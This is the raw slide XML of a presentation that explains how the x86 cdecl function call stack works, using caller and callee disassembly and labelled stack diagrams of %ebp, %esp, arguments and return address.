            <p:cNvPr id="316" name="Shape 316"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="14542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24" name="文本框 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{853C4DDC-5FE3-4A4F-8411-85A63C6AB2C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="463941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函数调用栈的工作方式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="矩形 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB651D2C-3E25-46D0-896F-55EC3D2B9E02}"/>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2" name="Shape 322"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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00000000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0: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   8b 55 08    mov    0x8(%ebp),%edx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6:   8b 45 0c    mov    0xc(%ebp),%eax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9:   01 c2       add    %eax,%edx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b:   8b 45 10    mov    0x10(%ebp),%eax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e:   01 d0       add    %edx,%eax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10:   5d          pop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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Shape 323"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="3121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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>00000012 &lt;caller&gt;:</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12:   55              push   %ebp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13:   89 e5           mov    %esp,%ebp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15:   83 ec 10        sub    $0x10,%esp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18:   6a 03           push   $0x3</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1a:   6a 02           push   $0x2</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1c:   6a 01           push   $0x1</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1e:   e8 fc ff ff ff  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>call   1f &lt;callee&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>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23:   83 c4 0c        add    $0xc,%esp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26:   89 45 fc        mov    %eax,-0x4(%ebp)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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)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2d:   8b 45 fc        mov    -0x4(%ebp),%eax</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30:   c9              leave</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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="Shape 324"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980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%ebp in caller's caller</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325" name="Shape 325"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389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int ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="Shape 326"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799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327" name="Shape 327"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="32089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328" name="Shape 328"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="36185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329" name="Shape 329"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="365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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="330" name="Shape 330"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="331" name="Shape 331"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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%ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="332" name="Shape 332"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="333" name="Shape 333"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444788" y="5485680"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="334" name="Shape 334"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="335" name="Shape 335"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="17637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336" name="Shape 336"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4028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3</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337" name="Shape 337"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4437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2</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Shape 338"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4847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1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="339" name="Shape 339"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="52569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return address (callee)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="340" name="Shape 340"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-153529" y="4696937"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="341" name="Shape 341"/>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%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="342" name="Shape 342"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="14542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25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59A36658-4A28-410E-B8D1-1F764590CD48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="463941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函数调用栈的工作方式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="矩形 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{476BCF5A-39EA-46F4-B873-3F2596DE6221}"/>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8" name="Shape 348"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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00000000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0:   55          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push   %ebp</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   89 e5       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov    %esp,%ebp</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   8b 55 08    mov    0x8(%ebp),%edx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6:   8b 45 0c    mov    0xc(%ebp),%eax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9:   01 c2       add    %eax,%edx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b:   8b 45 10    mov    0x10(%ebp),%eax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e:   01 d0       add    %edx,%eax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10:   5d          pop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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="349" name="Shape 349"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="3121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00000012 &lt;caller&gt;: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12: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13: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15:   83 ec 10        sub    $0x10,%esp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18:   6a 03           push   $0x3</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1a:   6a 02           push   $0x2</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1c:   6a 01           push   $0x1</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1e:   e8 fc ff ff ff  call   1f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23:   83 c4 0c        add    $0xc,%esp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26:   89 45 fc        mov    %eax,-0x4(%ebp)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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)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2d:   8b 45 fc        mov    -0x4(%ebp),%eax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30:   c9              leave</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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="350" name="Shape 350"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980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%ebp in caller's caller</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="Shape 351"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389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int ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="Shape 352"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799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353" name="Shape 353"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="32089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354" name="Shape 354"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="36185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355" name="Shape 355"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="365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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="356" name="Shape 356"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798409" y="5910533"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1633503"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="357" name="Shape 357"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1633503"/>
              <a:ext cx="11262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b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1333" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="358" name="Shape 358"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="17637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359" name="Shape 359"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4028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3</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360" name="Shape 360"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4437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2</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="Shape 361"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4847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1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362" name="Shape 362"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="52569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return address (callee)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363" name="Shape 363"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="56665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%ebp in caller</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="364" name="Shape 364"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-153529" y="5103337"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="365" name="Shape 365"/>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%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="366" name="Shape 366"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="14542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23" name="文本框 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBC312AD-6758-4063-BECA-B0DEA437CFA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="463941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函数调用栈的工作方式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="矩形 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D55193B5-259B-4339-A62B-A6F37CA3BC5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2" name="Shape 372"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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00000000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0: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   8b 55 08    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov    0x8(%ebp),%edx</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6:   8b 45 0c    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
